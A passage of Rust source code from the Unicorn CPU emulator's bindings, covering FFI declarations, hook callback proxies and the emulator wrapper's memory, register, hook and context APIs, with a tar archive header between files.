uc_mem_map(engine: uc_handle, address: u64, size: libc::size_t, perms: u32) -> uc_error; pub fn uc_mem_map_ptr( engine: uc_handle, address: u64, size: libc::size_t, perms: u32, ptr: *mut c_void, ) -> uc_error; pub fn uc_mmio_map( engine: uc_handle, address: u64, size: libc::size_t, read_cb: *mut c_void, user_data_read: *mut c_void, write_cb: *mut c_void, user_data_write: *mut c_void, ) -> uc_error; pub fn uc_mem_unmap(engine: uc_handle, address: u64, size: libc::size_t) -> uc_error; pub fn uc_mem_protect( engine: uc_handle, address: u64, size: libc::size_t, perms: u32, ) -> uc_error; pub fn uc_mem_regions( engine: uc_handle, regions: *const *const MemRegion, count: *mut u32, ) -> uc_error; pub fn uc_emu_start( engine: uc_handle, begin: u64, until: u64, timeout: u64, count: libc::size_t, ) -> uc_error; pub fn uc_emu_stop(engine: uc_handle) -> uc_error; pub fn uc_hook_add( engine: uc_handle, hook: *mut uc_hook, hook_type: HookType, callback: *mut c_void, user_data: *mut c_void, begin: u64, end: u64, ... ) -> uc_error; pub fn uc_hook_del(engine: uc_handle, hook: uc_hook) -> uc_error; pub fn uc_query(engine: uc_handle, query_type: Query, result: *mut libc::size_t) -> uc_error; pub fn uc_context_alloc(engine: uc_handle, context: *mut uc_context) -> uc_error; pub fn uc_context_save(engine: uc_handle, context: uc_context) -> uc_error; pub fn uc_context_restore(engine: uc_handle, context: uc_context) -> uc_error; pub fn uc_ctl(engine: uc_handle, control: u32, ...) -> uc_error; } pub struct UcHook<'a, D: 'a, F: 'a> { pub callback: F, pub uc: Weak<UnsafeCell<UnicornInner<'a, D>>>, } pub trait IsUcHook<'a> {} impl<'a, D, F> IsUcHook<'a> for UcHook<'a, D, F> {} pub unsafe extern "C" fn mmio_read_callback_proxy<D, F>( uc: uc_handle, offset: u64, size: usize, user_data: *mut UcHook<D, F>, ) -> u64 where F: FnMut(&mut crate::Unicorn<D>, u64, usize) -> u64, { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, offset, size) } pub unsafe extern "C" fn mmio_write_callback_proxy<D, F>( uc: uc_handle, offset: u64, size: usize, value: u64, user_data: *mut UcHook<D, F>, ) where F: FnMut(&mut crate::Unicorn<D>, u64, usize, u64), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, offset, size, value); } pub unsafe extern "C" fn code_hook_proxy<D, F>( uc: uc_handle, address: u64, size: u32, user_data: *mut UcHook<D, F>, ) where F: FnMut(&mut crate::Unicorn<D>, u64, u32), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, address, size); } pub unsafe extern "C" fn block_hook_proxy<D, F>( uc: uc_handle, address: u64, size: u32, user_data: *mut UcHook<D, F>, ) where F: FnMut(&mut crate::Unicorn<D>, u64, u32), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, address, size); } pub unsafe extern "C" fn mem_hook_proxy<D, F>( uc: uc_handle, mem_type: MemType, address: u64, size: u32, value: i64, user_data: *mut UcHook<D, F>, ) -> bool where F: FnMut(&mut crate::Unicorn<D>, MemType, u64, usize, i64) -> bool, { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, mem_type, address, size as usize, value) } pub unsafe extern "C" fn intr_hook_proxy<D, F>( uc: uc_handle, value: u32, user_data: *mut UcHook<D, F>, ) where F: FnMut(&mut crate::Unicorn<D>, u32), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, value); } pub unsafe extern "C" fn insn_in_hook_proxy<D, F>( uc: uc_handle, port: u32, size: usize, user_data: *mut UcHook<D, F>, ) -> u32 where F: FnMut(&mut crate::Unicorn<D>, u32, usize) -> u32, { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, port, size) } pub unsafe extern "C" fn insn_invalid_hook_proxy<D, F>( uc: uc_handle, user_data: *mut UcHook<D, F>, ) -> bool where F: FnMut(&mut crate::Unicorn<D>) -> bool, { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc) } pub unsafe extern "C" fn insn_out_hook_proxy<D, F>( uc: uc_handle, port: u32, size: usize, value: u32, user_data: *mut UcHook<D, F>, ) where F: FnMut(&mut crate::Unicorn<D>, u32, usize, u32), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, port, size, value); } pub unsafe extern "C" fn insn_sys_hook_proxy<D, F>(uc: uc_handle, user_data: *mut UcHook<D, F>) where F: FnMut(&mut crate::Unicorn<D>), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc); } pub unsafe extern "C" fn tlb_lookup_hook_proxy<D, F>( uc: uc_handle, vaddr: u64, mem_type: MemType, result: *mut TlbEntry, user_data: *mut UcHook<D, F>, ) -> bool where F: FnMut(&mut crate::Unicorn<D>, u64, MemType) -> Option<TlbEntry>, { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); let r = (user_data.callback)(&mut user_data_uc, vaddr, mem_type); if let Some(ref e) = r { let ref_result: &mut TlbEntry = &mut *result; *ref_result = *e; }; r.is_some() } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/lib.rs��������������������������������������������������������������0000664�0000000�0000000�00000115530�14675241067�0017706�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������//! Bindings for the Unicorn emulator. //! //! //! //! # Example use //! //! ```rust //! //! use unicorn_engine::RegisterARM; //! use unicorn_engine::unicorn_const::{Arch, Mode, Permission, SECOND_SCALE}; //! //! fn emulate() { //! let arm_code32 = [0x17, 0x00, 0x40, 0xe2]; // sub r0, #23 //! //! let mut emu = unicorn_engine::Unicorn::new(Arch::ARM, Mode::LITTLE_ENDIAN).expect("failed to initialize Unicorn instance"); //! emu.mem_map(0x1000, 0x4000, Permission::ALL).expect("failed to map code page"); //! emu.mem_write(0x1000, &arm_code32).expect("failed to write instructions"); //! //! emu.reg_write(RegisterARM::R0, 123).expect("failed write R0"); //! emu.reg_write(RegisterARM::R5, 1337).expect("failed write R5"); //! //! emu.emu_start(0x1000, (0x1000 + arm_code32.len()) as u64, 10 * SECOND_SCALE, 1000).unwrap(); //! assert_eq!(emu.reg_read(RegisterARM::R0), Ok(100)); //! assert_eq!(emu.reg_read(RegisterARM::R5), Ok(1337)); //! } //! ``` //! #![no_std] #[macro_use] extern crate alloc; extern crate std; use alloc::boxed::Box; use alloc::rc::Rc; use alloc::vec::Vec; use core::cell::UnsafeCell; use core::ptr; use libc::c_void; use ffi::uc_handle; #[macro_use] pub mod unicorn_const; pub use unicorn_const::*; pub mod ffi; // lets consumers call ffi if desired // include arm support if conditionally compiled in #[cfg(feature = "arch_arm")] mod arm; #[cfg(feature = "arch_arm")] pub use crate::arm::*; // include arm64 support if conditionally compiled in // NOTE: unicorn-c only separates on top-level arch name, // not on the bit-length, so we include both #[cfg(feature = "arch_arm")] mod arm64; #[cfg(feature = "arch_arm")] pub use crate::arm64::*; // include m68k support if conditionally compiled in #[cfg(feature = "arch_m68k")] mod m68k; #[cfg(feature = "arch_m68k")] pub use crate::m68k::*; // include mips support if conditionally compiled in #[cfg(feature = "arch_mips")] mod mips; #[cfg(feature = "arch_mips")] pub use crate::mips::*; // include ppc support if conditionally compiled in #[cfg(feature = "arch_ppc")] mod ppc; #[cfg(feature = "arch_ppc")] pub use crate::ppc::*; // include riscv support if conditionally compiled in #[cfg(feature = "arch_riscv")] mod riscv; #[cfg(feature = "arch_riscv")] pub use crate::riscv::*; // include s390x support if conditionally compiled in #[cfg(feature = "arch_s390x")] mod s390x; #[cfg(feature = "arch_s390x")] pub use crate::s390x::*; // include sparc support if conditionally compiled in #[cfg(feature = "arch_sparc")] mod sparc; #[cfg(feature = "arch_sparc")] pub use crate::sparc::*; // include tricore support if conditionally compiled in #[cfg(feature = "arch_tricore")] mod tricore; #[cfg(feature = "arch_tricore")] pub use crate::tricore::*; // include x86 support if conditionally compiled in #[cfg(feature = "arch_x86")] mod x86; #[cfg(feature = "arch_x86")] pub use crate::x86::*; #[derive(Debug)] pub struct Context { context: ffi::uc_context, } impl Context { #[must_use] pub fn is_initialized(&self) -> bool { !self.context.is_null() } } impl Drop for Context { fn drop(&mut self) { if self.is_initialized() { unsafe { ffi::uc_context_free(self.context); } } self.context = ptr::null_mut(); } } pub struct MmioCallbackScope<'a> { pub regions: Vec<(u64, usize)>, pub read_callback: Option<Box<dyn ffi::IsUcHook<'a> + 'a>>, pub write_callback: Option<Box<dyn ffi::IsUcHook<'a> + 'a>>, } impl<'a> MmioCallbackScope<'a> { fn has_regions(&self) -> bool { !self.regions.is_empty() } fn unmap(&mut self, begin: u64, size: usize) { let end: u64 = begin + size as u64; self.regions = self .regions .iter() .flat_map(|(b, s)| { let e: u64 = b + *s as u64; if begin > *b { if begin >= e { // The unmapped region is completely after this region vec![(*b, *s)] } else if end >= e { // The unmapped region overlaps with the end of this region vec![(*b, (begin - *b) as usize)] } else { // The unmapped region is in the middle of this region let second_b = end + 1; vec![ (*b, (begin - *b) as usize), (second_b, (e - second_b) as usize), ] } } else if end > *b { if end >= e { // The unmapped region completely contains this region vec![] } else { // The unmapped region overlaps with the start of this region vec![(end, (e - end) as usize)] } } else { // The unmapped region is completely before this region vec![(*b, *s)] } }) .collect(); } } #[derive(Clone, Copy, PartialEq, Eq, Debug)] pub struct UcHookId(ffi::uc_hook); pub struct UnicornInner<'a, D> { pub handle: uc_handle, pub ffi: bool, pub arch: Arch, /// to keep ownership over the hook for this uc instance's lifetime pub hooks: Vec<(UcHookId, Box<dyn ffi::IsUcHook<'a> + 'a>)>, /// To keep ownership over the mmio callbacks for this uc instance's lifetime pub mmio_callbacks: Vec<MmioCallbackScope<'a>>, pub data: D, } /// Drop UC impl<'a, D> Drop for UnicornInner<'a, D> { fn drop(&mut self) { if !self.ffi && !self.handle.is_null() { unsafe { ffi::uc_close(self.handle) }; } self.handle = ptr::null_mut(); } } /// A Unicorn emulator instance. pub struct Unicorn<'a, D: 'a> { inner: Rc<UnsafeCell<UnicornInner<'a, D>>>, } impl<'a> Unicorn<'a, ()> { /// Create a new instance of the unicorn engine for the specified architecture /// and hardware mode. pub fn new(arch: Arch, mode: Mode) -> Result<Unicorn<'a, ()>, uc_error> { Self::new_with_data(arch, mode, ()) } /// # Safety /// The function has to be called with a valid uc_handle pointer /// that was previously allocated by a call to uc_open. /// Calling the function with a non null pointer value that /// does not point to a unicorn instance will cause undefined /// behavior. pub unsafe fn from_handle(handle: uc_handle) -> Result<Unicorn<'a, ()>, uc_error> { if handle.is_null() { return Err(uc_error::HANDLE); } let mut arch: libc::size_t = Default::default(); let err = unsafe { ffi::uc_query(handle, Query::ARCH, &mut arch) }; if err != uc_error::OK { return Err(err); } Ok(Unicorn { inner: Rc::new(UnsafeCell::from(UnicornInner { handle, ffi: true, arch: arch.try_into()?, data: (), hooks: vec![], mmio_callbacks: vec![], })), }) } } impl<'a, D> Unicorn<'a, D> where D: 'a, { /// Create a new instance of the unicorn engine for the specified architecture /// and hardware mode. pub fn new_with_data(arch: Arch, mode: Mode, data: D) -> Result<Unicorn<'a, D>, uc_error> { let mut handle = ptr::null_mut(); unsafe { ffi::uc_open(arch, mode, &mut handle) }.and_then(|| { Ok(Unicorn { inner: Rc::new(UnsafeCell::from(UnicornInner { handle, ffi: false, arch, data, hooks: vec![], mmio_callbacks: vec![], })), }) }) } } impl<'a, D> core::fmt::Debug for Unicorn<'a, D> { fn fmt(&self, formatter: &mut core::fmt::Formatter) -> core::fmt::Result { write!(formatter, "Unicorn {{ uc: {:p} }}", self.get_handle()) } } impl<'a, D> Unicorn<'a, D> { fn inner(&self) -> &UnicornInner<'a, D> { unsafe { self.inner.get().as_ref().unwrap() } } fn inner_mut(&mut self) -> &mut UnicornInner<'a, D> { unsafe { self.inner.get().as_mut().unwrap() } } /// Return whatever data was passed during initialization. /// /// For an example, have a look at `utils::init_emu_with_heap` where /// a struct is passed which is used for a custom allocator. #[must_use] pub fn get_data(&self) -> &D { &self.inner().data } /// Return a mutable reference to whatever data was passed during initialization. #[must_use] pub fn get_data_mut(&mut self) -> &mut D { &mut self.inner_mut().data } /// Return the architecture of the current emulator. #[must_use] pub fn get_arch(&self) -> Arch { self.inner().arch } /// Return the handle of the current emulator. #[must_use] pub fn get_handle(&self) -> uc_handle { self.inner().handle } /// Returns a vector with the memory regions that are mapped in the emulator. pub fn mem_regions(&self) -> Result<Vec<MemRegion>, uc_error> { let mut nb_regions: u32 = 0; let p_regions: *const MemRegion = ptr::null_mut(); unsafe { ffi::uc_mem_regions(self.get_handle(), &p_regions, &mut nb_regions) }.and_then( || { let mut regions = Vec::new(); for i in 0..nb_regions { regions.push(unsafe { core::mem::transmute_copy(&*p_regions.add(i as usize)) }); } unsafe { libc::free(p_regions as _) }; Ok(regions) }, ) } /// Read a range of bytes from memory at the specified emulated physical address. pub fn mem_read(&self, address: u64, buf: &mut [u8]) -> Result<(), uc_error> { unsafe { ffi::uc_mem_read(self.get_handle(), address, buf.as_mut_ptr(), buf.len()) }.into() } /// Return a range of bytes from memory at the specified emulated physical address as vector. pub fn mem_read_as_vec(&self, address: u64, size: usize) -> Result<Vec<u8>, uc_error> { let mut buf = vec![0; size]; unsafe { ffi::uc_mem_read(self.get_handle(), address, buf.as_mut_ptr(), size) }.and(Ok(buf)) } /// Write the data in `bytes` to the emulated physical address `address` pub fn mem_write(&mut self, address: u64, bytes: &[u8]) -> Result<(), uc_error> { unsafe { ffi::uc_mem_write(self.get_handle(), address, bytes.as_ptr(), bytes.len()) }.into() } /// Map an existing memory region in the emulator at the specified address. /// /// # Safety /// /// This function is marked unsafe because it is the responsibility of the caller to /// ensure that `size` matches the size of the passed buffer, an invalid `size` value will /// likely cause a crash in unicorn. /// /// `address` must be aligned to 4kb or this will return `Error::ARG`. /// /// `size` must be a multiple of 4kb or this will return `Error::ARG`. /// /// `ptr` is a pointer to the provided memory region that will be used by the emulator. pub unsafe fn mem_map_ptr( &mut self, address: u64, size: usize, perms: Permission, ptr: *mut c_void, ) -> Result<(), uc_error> { ffi::uc_mem_map_ptr(self.get_handle(), address, size, perms.bits(), ptr).into() } /// Map a memory region in the emulator at the specified address. /// /// `address` must be aligned to 4kb or this will return `Error::ARG`. /// `size` must be a multiple of 4kb or this will return `Error::ARG`. pub fn mem_map( &mut self, address: u64, size: libc::size_t, perms: Permission, ) -> Result<(), uc_error> { unsafe { ffi::uc_mem_map(self.get_handle(), address, size, perms.bits()) }.into() } /// Map in am MMIO region backed by callbacks. /// /// `address` must be aligned to 4kb or this will return `Error::ARG`. /// `size` must be a multiple of 4kb or this will return `Error::ARG`. pub fn mmio_map<R: 'a, W: 'a>( &mut self, address: u64, size: libc::size_t, read_callback: Option<R>, write_callback: Option<W>, ) -> Result<(), uc_error> where R: FnMut(&mut Unicorn<D>, u64, usize) -> u64, W: FnMut(&mut Unicorn<D>, u64, usize, u64), { let mut read_data = read_callback.map(|c| { Box::new(ffi::UcHook { callback: c, uc: Rc::downgrade(&self.inner), }) }); let mut write_data = write_callback.map(|c| { Box::new(ffi::UcHook { callback: c, uc: Rc::downgrade(&self.inner), }) }); unsafe { ffi::uc_mmio_map( self.get_handle(), address, size, match read_data { Some(_) => ffi::mmio_read_callback_proxy::<D, R> as _, None => ptr::null_mut(), }, match read_data { Some(ref mut d) => d.as_mut() as *mut _ as _, None => ptr::null_mut(), }, match write_data { Some(_) => ffi::mmio_write_callback_proxy::<D, W> as _, None => ptr::null_mut(), }, match write_data { Some(ref mut d) => d.as_mut() as *mut _ as _, None => ptr::null_mut(), }, ) } .and_then(|| { let rd = read_data.map(|c| c as Box<dyn ffi::IsUcHook>); let wd = write_data.map(|c| c as Box<dyn ffi::IsUcHook>); self.inner_mut().mmio_callbacks.push(MmioCallbackScope { regions: vec![(address, size)], read_callback: rd, write_callback: wd, }); Ok(()) }) } /// Map in a read-only MMIO region backed by a callback. /// /// `address` must be aligned to 4kb or this will return `Error::ARG`. /// `size` must be a multiple of 4kb or this will return `Error::ARG`. pub fn mmio_map_ro<F: 'a>( &mut self, address: u64, size: libc::size_t, callback: F, ) -> Result<(), uc_error> where F: FnMut(&mut Unicorn<D>, u64, usize) -> u64, { self.mmio_map( address, size, Some(callback), None::<fn(&mut Unicorn<D>, u64, usize, u64)>, ) } /// Map in a write-only MMIO region backed by a callback. /// /// `address` must be aligned to 4kb or this will return `Error::ARG`. /// `size` must be a multiple of 4kb or this will return `Error::ARG`. pub fn mmio_map_wo<F: 'a>( &mut self, address: u64, size: libc::size_t, callback: F, ) -> Result<(), uc_error> where F: FnMut(&mut Unicorn<D>, u64, usize, u64), { self.mmio_map( address, size, None::<fn(&mut Unicorn<D>, u64, usize) -> u64>, Some(callback), ) } /// Unmap a memory region. /// /// `address` must be aligned to 4kb or this will return `Error::ARG`. /// `size` must be a multiple of 4kb or this will return `Error::ARG`. pub fn mem_unmap(&mut self, address: u64, size: libc::size_t) -> Result<(), uc_error> { let err = unsafe { ffi::uc_mem_unmap(self.get_handle(), address, size) }; self.mmio_unmap(address, size); err.into() } fn mmio_unmap(&mut self, address: u64, size: libc::size_t) { for scope in self.inner_mut().mmio_callbacks.iter_mut() { scope.unmap(address, size); } self.inner_mut() .mmio_callbacks .retain(|scope| scope.has_regions()); } /// Set the memory permissions for an existing memory region. /// /// `address` must be aligned to 4kb or this will return `Error::ARG`. /// `size` must be a multiple of 4kb or this will return `Error::ARG`. pub fn mem_protect( &mut self, address: u64, size: libc::size_t, perms: Permission, ) -> Result<(), uc_error> { unsafe { ffi::uc_mem_protect(self.get_handle(), address, size, perms.bits()) }.into() } /// Write an unsigned value from a register. pub fn reg_write<T: Into<i32>>(&mut self, regid: T, value: u64) -> Result<(), uc_error> { unsafe { ffi::uc_reg_write(self.get_handle(), regid.into(), &value as *const _ as _) } .into() } /// Write variable sized values into registers. /// /// The user has to make sure that the buffer length matches the register size. /// This adds support for registers >64 bit (GDTR/IDTR, XMM, YMM, ZMM (x86); Q, V (arm64)). pub fn reg_write_long<T: Into<i32>>(&self, regid: T, value: &[u8]) -> Result<(), uc_error> { unsafe { ffi::uc_reg_write(self.get_handle(), regid.into(), value.as_ptr() as _) }.into() } /// Read an unsigned value from a register. /// /// Not to be used with registers larger than 64 bit. pub fn reg_read<T: Into<i32>>(&self, regid: T) -> Result<u64, uc_error> { let mut value: u64 = 0; unsafe { ffi::uc_reg_read(self.get_handle(), regid.into(), &mut value as *mut u64 as _) } .and(Ok(value)) } /// Read 128, 256 or 512 bit register value into heap allocated byte array. /// /// This adds safe support for registers >64 bit (GDTR/IDTR, XMM, YMM, ZMM, ST (x86); Q, V (arm64)). pub fn reg_read_long<T: Into<i32>>(&self, regid: T) -> Result<Box<[u8]>, uc_error> { let curr_reg_id = regid.into(); let curr_arch = self.get_arch(); let value_size = match curr_arch { #[cfg(feature = "arch_x86")] Arch::X86 => Self::value_size_x86(curr_reg_id)?, #[cfg(feature = "arch_arm")] Arch::ARM64 => Self::value_size_arm64(curr_reg_id)?, _ => Err(uc_error::ARCH)?, }; let mut value = vec![0; value_size]; unsafe { ffi::uc_reg_read(self.get_handle(), curr_reg_id, value.as_mut_ptr() as _) } .and_then(|| Ok(value.into_boxed_slice())) } #[cfg(feature = "arch_arm")] fn value_size_arm64(curr_reg_id: i32) -> Result<usize, uc_error> { match curr_reg_id { r if (RegisterARM64::Q0 as i32..=RegisterARM64::Q31 as i32).contains(&r) || (RegisterARM64::V0 as i32..=RegisterARM64::V31 as i32).contains(&r) => { Ok(16) } _ => Err(uc_error::ARG), } } #[cfg(feature = "arch_x86")] fn value_size_x86(curr_reg_id: i32) -> Result<usize, uc_error> { match curr_reg_id { r if (RegisterX86::XMM0 as i32..=RegisterX86::XMM31 as i32).contains(&r) => Ok(16), r if (RegisterX86::YMM0 as i32..=RegisterX86::YMM31 as i32).contains(&r) => Ok(32), r if (RegisterX86::ZMM0 as i32..=RegisterX86::ZMM31 as i32).contains(&r) => Ok(64), r if r == RegisterX86::GDTR as i32 || r == RegisterX86::IDTR as i32 || (RegisterX86::ST0 as i32..=RegisterX86::ST7 as i32).contains(&r) => { Ok(10) } _ => Err(uc_error::ARG), } } /// Read a signed 32-bit value from a register. pub fn reg_read_i32<T: Into<i32>>(&self, regid: T) -> Result<i32, uc_error> { let mut value: i32 = 0; unsafe { ffi::uc_reg_read(self.get_handle(), regid.into(), &mut value as *mut i32 as _) } .and(Ok(value)) } /// Add a code hook. pub fn add_code_hook<F: 'a>( &mut self, begin: u64, end: u64, callback: F, ) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u64, u32) + 'a, { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::CODE, ffi::code_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, begin, end, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add a block hook. pub fn add_block_hook<F: 'a>( &mut self, begin: u64, end: u64, callback: F, ) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u64, u32), { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::BLOCK, ffi::block_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, begin, end, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add a memory hook. pub fn add_mem_hook<F: 'a>( &mut self, hook_type: HookType, begin: u64, end: u64, callback: F, ) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, MemType, u64, usize, i64) -> bool, { if !(HookType::MEM_ALL | HookType::MEM_READ_AFTER).contains(hook_type) { return Err(uc_error::ARG); } let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, hook_type, ffi::mem_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, begin, end, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add an interrupt hook. pub fn add_intr_hook<F: 'a>(&mut self, callback: F) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u32), { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::INTR, ffi::intr_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, 0, 0, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add hook for invalid instructions pub fn add_insn_invalid_hook<F: 'a>(&mut self, callback: F) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>) -> bool, { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::INSN_INVALID, ffi::insn_invalid_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, 0, 0, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add hook for x86 IN instruction. #[cfg(feature = "arch_x86")] pub fn add_insn_in_hook<F: 'a>(&mut self, callback: F) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u32, usize) -> u32, { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::INSN, ffi::insn_in_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, 0, 0, InsnX86::IN, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add hook for x86 OUT instruction. #[cfg(feature = "arch_x86")] pub fn add_insn_out_hook<F: 'a>(&mut self, callback: F) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u32, usize, u32), { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::INSN, ffi::insn_out_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, 0, 0, InsnX86::OUT, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Add hook for x86 SYSCALL or SYSENTER. #[cfg(feature = "arch_x86")] pub fn add_insn_sys_hook<F>( &mut self, insn_type: InsnSysX86, begin: u64, end: u64, callback: F, ) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>) + 'a, { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::INSN, ffi::insn_sys_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, begin, end, insn_type, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } pub fn add_tlb_hook<F>( &mut self, begin: u64, end: u64, callback: F, ) -> Result<UcHookId, uc_error> where F: FnMut(&mut Unicorn<D>, u64, MemType) -> Option<TlbEntry> + 'a, { let mut hook_id = ptr::null_mut(); let mut user_data = Box::new(ffi::UcHook { callback, uc: Rc::downgrade(&self.inner), }); unsafe { ffi::uc_hook_add( self.get_handle(), &mut hook_id, HookType::TLB, ffi::tlb_lookup_hook_proxy::<D, F> as _, user_data.as_mut() as *mut _ as _, begin, end, ) } .and_then(|| { let hook_id = UcHookId(hook_id); self.inner_mut().hooks.push((hook_id, user_data)); Ok(hook_id) }) } /// Remove a hook. /// /// `hook_id` is the value returned by `add_*_hook` functions. pub fn remove_hook(&mut self, hook_id: UcHookId) -> Result<(), uc_error> { // drop the hook let inner = self.inner_mut(); inner.hooks.retain(|(id, _)| id != &hook_id); unsafe { ffi::uc_hook_del(inner.handle, hook_id.0) }.into() } /// Allocate and return an empty Unicorn context. /// /// To be populated via `context_save`. pub fn context_alloc(&self) -> Result<Context, uc_error> { let mut empty_context: ffi::uc_context = ptr::null_mut(); unsafe { ffi::uc_context_alloc(self.get_handle(), &mut empty_context) }.and(Ok(Context { context: empty_context, })) } /// Save current Unicorn context to previously allocated Context struct. pub fn context_save(&self, context: &mut Context) -> Result<(), uc_error> { unsafe { ffi::uc_context_save(self.get_handle(), context.context) }.into() } /// Allocate and return a Context struct initialized with the current CPU context. /// /// This can be used for fast rollbacks with `context_restore`. /// In case of many non-concurrent context saves, use `context_alloc` and *_save /// individually to avoid unnecessary allocations. pub fn context_init(&self) -> Result<Context, uc_error> { let mut new_context: ffi::uc_context = ptr::null_mut(); unsafe { ffi::uc_context_alloc(self.get_handle(), &mut new_context).and_then(|| { ffi::uc_context_save(self.get_handle(), new_context) .and(Ok(Context { context: new_context, })) .map_err(|e| { ffi::uc_context_free(new_context); e }) }) } } /// Restore a previously saved Unicorn context. /// /// Perform a quick rollback of the CPU context, including registers and some /// internal metadata. Contexts may not be shared across engine instances with /// differing arches or modes. Memory has to be restored manually, if needed. pub fn context_restore(&self, context: &Context) -> Result<(), uc_error> { unsafe { ffi::uc_context_restore(self.get_handle(), context.context) }.into() } /// Emulate machine code for a specified duration. /// /// `begin` is the address where to start the emulation. The emulation stops if `until` /// is hit. `timeout` specifies a duration in microseconds after which the emulation is /// stopped (infinite execution if set to 0). `count` is the maximum number of instructions /// to emulate (emulate all the available instructions if set to 0). pub fn emu_start( &mut self, begin: u64, until: u64, timeout: u64, count: usize, ) -> Result<(), uc_error> { unsafe { ffi::uc_emu_start(self.get_handle(), begin, until, timeout, count as _) }.into() } /// Stop the emulation. /// /// This is usually called from callback function in hooks. /// NOTE: For now, this will stop the execution only after 